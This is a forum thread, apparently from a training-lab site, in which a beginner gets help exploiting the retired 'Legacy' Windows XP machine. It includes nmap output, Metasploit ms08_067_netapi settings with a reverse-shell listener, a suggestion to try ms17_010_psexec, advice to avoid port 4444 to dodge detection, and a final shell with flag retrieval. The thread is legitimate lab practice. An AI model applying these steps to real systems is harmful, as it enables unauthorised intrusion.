Retired Machine Legacy (Solved)

edited October 6 in Machines

Good Afternoon all, I am kinda new here and I joined VIP today so I could practice on retired machines. I have went through the forums and read all the similar posts which have not helped me to fix my problem. I am currently doing the Legacy machine and could use a little help. Here is my Nmap scan,

nmap -sC -sV -oA Legacy 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 14:15 EDT
Nmap scan report for 10.10.10.4
Host is up (0.048s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|clock-skew: mean: -4h23m27s, deviation: 2h07m16s, median: -5h53m27s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:3c:37 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|
System time: 2020-10-05T18:22:39+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

So, I see port 445 is open so I go to metasploit to use the ms08-067 exploit. I change the RHOSTS to 10.10.10.4 and LHOST to mine (10.10.14.25) and set target to 6 which is windows server svcpk3. When i run the exploit i get the following error.

Started reverse TCP handler on 10.10.14.25:4444
[-] 10.10.10.4:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (10.10.10.4:445)

I have tried running both exploits with no success, any helpful nudges would be greatly appreciated.

initDr

Tagged:

Comments

  • @initDr said:

    Started reverse TCP handler on 10.10.14.25:4444
    [-] 10.10.10.4:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (10.10.10.4:445)

    This implies metasploit cant see the remote system which doesn't really make sense as nmap obviously saw it.

    Is your issue the same as the one here: https://security.stackexchange.com/questions/73479/exploit-failed-unreachable-rexconnectiontimeout-the-connection-timed-outre ?

    If so, I'd start with trying a different port from 4444.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Yeah, very similar to that article. I've tried restarting my vm with no luck. what listening port would you recommend using TazWake?

    initDr

  • @initDr said:

    Yeah, very similar to that article. I've tried restarting my vm with no luck. what listening port would you recommend using TazWake?

    Try 8923 to avoid any collisions as its unlikely anything else will be on that. I find it always makes sense to avoid using 4444 if you can, if nothing else its almost always detected by security tools in real life.

    Other than that, work through all the options and see if changing any of them helps.

    show options is helpful if you aren't used to Metasploit.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • oh yeah, I almost always show options once i pick an exploit to use. since I don't have them all memorized I need to know what to change lol. :) I'll try 8923 thanks for your help TazWake!

    initDr

  • @initDr said:

    Yeah, very similar to that article. I've tried restarting my vm with no luck. what listening port would you recommend using TazWake?

    Alternatively - because MS08-67 is so old things may have changed in the internals of MSF, you could try a different SMB exploit like Eternal Blue (MS17-10) which is well handled by metasploit. (ms17_010_psexec is a good one to try)

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Type your comment> @TazWake said:

    Alternatively - because MS08-67 is so old things may have changed in the internals of MSF, you could try a different SMB exploit like Eternal Blue (MS17-10) which is well handled by metasploit. (ms17_010_psexec is a good one to try)

    MSF also has scanners for a variety of smb attacks. If you are struggling to find one that works I'd suggest investigating those.

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • I'm looking into those right now LMAY75, There's 125... so, might take a minute lol.

    initDr

  • ok, lol now all the ports are showing up as filtered... wtf?!?

    80/tcp filtered http
    139/tcp filtered netbios-ssn
    445/tcp filtered microsoft-ds
    8080/tcp filtered http-proxy

    Maybe I need to just walk away for a minute and collect my brains.

    initDr

  • lmao, ok guys it was literally a noob error. i stopped the machine and restarted it. Then my nmapping was correct again. msfconsole use windows/smb/ms08_067_netapi. the set RHOSTS to 10.10.10.4 set LHOST to 10.10.14.25 set target to 6 or 7 they both work. Got in, opened a shell in metrepreter went to C:\Documents and Settings(Admin and John) retrieved both the flags! ;) Thanks for the help though!

    initDr

Sign In to comment.